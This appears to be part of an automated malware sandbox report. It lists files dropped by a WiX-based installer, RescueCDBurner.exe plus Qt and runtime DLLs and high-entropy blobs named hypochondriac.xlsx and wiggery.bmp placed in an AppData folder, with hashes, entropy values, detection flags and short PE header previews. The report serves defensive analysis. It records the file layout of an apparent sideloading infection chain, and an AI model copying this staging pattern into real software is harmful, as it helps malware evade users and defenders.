                                                                                                                                                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtCore4.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2598912
                                                                                                                                                                Entropy (8bit):6.6049974235008655
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                                MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                                SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                                SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                                SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<*,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&..*...Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtGui4.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):8581632
                                                                                                                                                                Entropy (8bit):6.736578346160889
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                                MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                                SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                                SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                                SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtNetwork4.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1053696
                                                                                                                                                                Entropy (8bit):6.539052666912709
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                                MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                                SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                                SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                                SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtXml4.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):356352
                                                                                                                                                                Entropy (8bit):6.447802510709224
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                                MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                                SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                                SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                                SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6487736
                                                                                                                                                                Entropy (8bit):7.518089126573906
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                                MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                                SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                                SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Roaming\Remoteservicezoo_test\StarBurn.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):664064
                                                                                                                                                                Entropy (8bit):6.953961612144461
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                                MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                                SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                                SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                                SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Roaming\Remoteservicezoo_test\hypochondriac.xlsx

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60283
                                                                                                                                                                Entropy (8bit):4.569551839311306
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                                MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                                SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                                SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                                SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

                                                                                                                                                                C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcp100.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):421200
                                                                                                                                                                Entropy (8bit):6.59808962341698
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                                MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                                SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                                SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                                SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcr100.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):770384
                                                                                                                                                                Entropy (8bit):6.908020029901359
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                                MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                                SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                                SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                                SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Roaming\Remoteservicezoo_test\wiggery.bmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4485813
                                                                                                                                                                Entropy (8bit):7.960501110953352
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:zvf5BQTYhbOg6IdJogvR31mRCbJ2O4qm08UhFdFtZ7C5Bd6wKWgSKNKk8R:zvhy2cW31mRCbEqf8UhFiBdQ+kO
                                                                                                                                                                MD5:B56FE6EA5F9CAFB0C73A95A3377C8CA1
                                                                                                                                                                SHA1:252F48E39D28A5554152F32F23A406E4E9E752DD
                                                                                                                                                                SHA-256:04C5B808B740AC5F17B12956AD0D1B2C21EA1D6A6011275AC2A0D08B454EDB6A
                                                                                                                                                                SHA-512:1A094CD5029F1D2BD0E804EC7F1911CF25CE319BEF3EB03BC57DF09A5BCF5957C813F9F7FF57B936F0596E0E00F3B447E2E2C3B5BAE9F3AD99BEB63C441DC0D7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.b...C.y.y.m..L......\^..n.N.HQ..n.Eh.....l..q.JY.kE....peI.k.c..mE..c.Lr\p...ZTW.X.qo.s.x..HHb.f.aq..s.\E^^mYoR_Cb...].xBM.xR.[.kpg.MGx_.x.Xkx..._...jilM.[.CAm....tV...wtM...ywlI..yU.S.WQHig..w.].Sx_QX]...LLL_sC.P.y.pj.TgH.C..dOC.RqnoF....Qv.....b.m..M.]X.L.hvbeZ..f.ma....tNrr.Cbe..S..Yvnjbh...C..mqWsjglcP.W.Mu.TIq..fYcf.K..WbMIp...IRn[.G..Y..V.._..]..L].U...L]O..L.uHt`.._VBuVd.hK.DhxRlwPY[...xo....F^SLA.....[gXWLVF.......wX.w.b...nlUr.E.D...UN.f..JM.f.T.CF.....yO.RmS]..d.^e...O..b.^\K^.......kc[U...yfym...Vc..a.oUd.rD.kDWFLcL.UIZM.cfQK.e^..hvr.oxq.FI..QNP...LQT..q...h..i_.hA.mu.d......HKg.UK...tL...x...q^...h.._.q.LT.g.t]do.BM.S.HKj[..q..R.[O^.E.IV.v..hfA.mh..^N..h.......Th..shY...xLOtm\Jl.\fZ..g.b.b.`....A.ao.f..^.y...of...B..y....R..W.P..nYuE..F.X...Wv.V..\^.rR.^..X....]gxml.ukp.Vc.f.F..A...K....Pix.IObhW_^C...^.....A.y..QUH.vg.W\o..hZ......MM....gK..L..m...E..T.O.i....pNt.Y..J...tD.n_...]JEfbw.p...f.^^.I..Y..L..QJb.M.i.H..........q..u..W^...Kv.T.y..fCeqB.l......bDm...._xd.].p.l..U

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\Ascidian.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):474056
                                                                                                                                                                Entropy (8bit):6.5454050911466695
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:ljzSlYxJd1mGgLzDxlzLIQNO1fc2G0LqR6tA15/5K+su:BzMz/VNUch0LqR6850lu
                                                                                                                                                                MD5:494C74C13C1E2E81E77240CC64F09206
                                                                                                                                                                SHA1:19C172D3B470F199EA50F7E71104CF30C538F351
                                                                                                                                                                SHA-256:DD8FA081CA5F7238C755C9D6E42F5A8ACA6F90B10412D4092EDA1DE6F76D8FF7
                                                                                                                                                                SHA-512:D76FA86BA474935809A057082E0C41C3CC7008477D0D8A035C4E77245BEBD9051B329BC07FD44FEC0FCF18B0C0779D60A497B36818C4A9815D7942DF8BE71672
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............P..P..P...P..P.F"P..P.F.PC.P.?P..P..P2.P./P..P.F.P..P.F'P..P.F&P..P.F!P..PRich..P........................PE..L......`...........!................k.............DZ.........................`.......q....@..........................-..................,E...............)......(P...................................w..@............................................text............................... ..`.rdata........... ..................@..@.data....a...0...>..................@....rsrc...,E.......F...\..............@..@.reloc...n.......p..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\BootstrapperApplicationData.xml

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (450), with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2384
                                                                                                                                                                Entropy (8bit):3.7598071625620997
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:y+03N6hOOvpEkwcne1LaJVc0wkycmeRPwJvgkWHmi1qrBZi1Hymrcl:Rwcn6Lwc0wkyc/Puvgk/WqrBZWSmrq
                                                                                                                                                                MD5:31320EA56CB0843809C37D1C6F0D6AF1
                                                                                                                                                                SHA1:53176DCF526AFADC71815A2A8404AFEC35C5452C
                                                                                                                                                                SHA-256:470FF6E6A66EDCA04C8E9525B22B2B8E8F94C7CDB814EA2CCDB037E276B2F6D8
                                                                                                                                                                SHA-512:75C0C4F7CC2A5E1424CFE3970F0DEC1394E21EC316D247ED0B78DAC8E03FABE46E290692B70C7707F85AA63F6F2DD75C0302237D8A5677E2A753AA60465D38E2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.w.i.x.t.o.o.l.s.e.t...o.r.g./.s.c.h.e.m.a.s./.v.4./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".R.u.b.r.i.c.i.a.n.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.7.3.F.A.9.7.B.8.-.5.F.C.7.-.4.3.D.A.-.9.8.3.E.-.7.E.C.4.0.2.A.0.4.6.D.6.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.0.8.6.0.9.1.1.9.-.8.A.3.0.-.4.1.2.6.-.9.3.3.A.-.7.6.D.5.0.C.9.A.E.8.3.7.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.R.o.l.l.b.a.c.k.B.o.u.n.d.a.r.y. .I.d.=.".W.i.x.D.e.f.a.u.l.t.B.o.u.n.d.a.r.y.". .V.i.t.a.l.=.".y.e.s.". .T.r.a.n.s.a.c.t.i.o.n.=.".n.o.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".P.a.x.w.a.x.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\BundleExtensionData.xml

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):252
                                                                                                                                                                Entropy (8bit):3.50802487441866
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:QFulcLk0YR5Ie8GcUlLulFwENeWlYmH1fMWGVUlLulFwEnk:QF/LXYRWe8OLqF3Ye1kWGaLqFhk
                                                                                                                                                                MD5:A35990570AFAA7D023FD2EBBE229AFB8
                                                                                                                                                                SHA1:86688B13D3364ADB90BBA552F544D4D546AFD63D
                                                                                                                                                                SHA-256:9B696AD0EC3B37BAC11DA76BCD51AD907D31EE9638DAD7BB8FDD5AEF919EF621
                                                                                                                                                                SHA-512:1845B25697FED6D694428F53B2D1B2ABF1ACF8A09E8E49A536759822AD5B1A75D51BC7AE4D73E435B7BBC23AC34C9AED76F17414D218B54DA546C908F9A5182C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.u.n.d.l.e.E.x.t.e.n.s.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.w.i.x.t.o.o.l.s.e.t...o.r.g./.s.c.h.e.m.a.s./.v.4./.B.u.n.d.l.e.E.x.t.e.n.s.i.o.n.D.a.t.a.". ./.>.

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtCore4.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2598912
                                                                                                                                                                Entropy (8bit):6.6049974235008655
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                                MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                                SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                                SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                                SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
